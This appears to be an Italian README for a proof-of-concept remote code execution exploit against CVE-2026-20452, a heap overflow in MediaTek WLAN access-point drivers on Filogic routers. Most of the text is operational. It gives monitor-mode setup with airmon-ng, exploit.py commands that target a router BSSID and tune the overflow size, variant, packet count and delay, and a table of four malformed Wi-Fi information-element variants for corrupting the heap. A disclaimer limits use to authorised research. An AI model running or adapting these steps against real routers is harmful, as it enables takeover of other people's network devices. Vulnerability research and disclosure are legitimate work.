
Proof-of-concept di exploit per CVE-2026-20452, un overflow del buffer basato su heap nei driver AP WLAN di MediaTek. Utilizza scapy per inviare frame di gestione Wi-Fi creati ad hoc per attivare l'esecuzione di codice remoto sui router Filogic interessati.
Prova di concetto per CVE-2026-20452, un overflow del buffer heap nel driver WLAN Access Point di MediaTek.
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# L'interfaccia diventa wlan0mon
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
Questo strumento è fornito esclusivamente a scopo di ricerca autorizzata e educativa. Trasmettere su frequenze Wi‑Fi potrebbe richiedere autorizzazione legale nella tua giurisdizione. L'uso non autorizzato contro sistemi di cui non si possiede o non si ha esplicita autorizzazione è illegale. Gli autori non si assumono alcuna responsabilità per usi impropri o danni causati da questo strumento.
| Variante | Tipo IE | Descrizione |
|---|
| 0 | Vendor Specific (221) | Singolo IE sovradimensionato con OUI 00:50:43 |
| 1 | Chained Vendor IEs | IE multipli piccoli per corrompere oggetti heap adiacenti |
| 2 | HT Capabilities (45) | IE HT Capabilities sovradimensionato |
| 3 | Extended Capabilities (127) | IE Extended Capabilities sovradimensionato |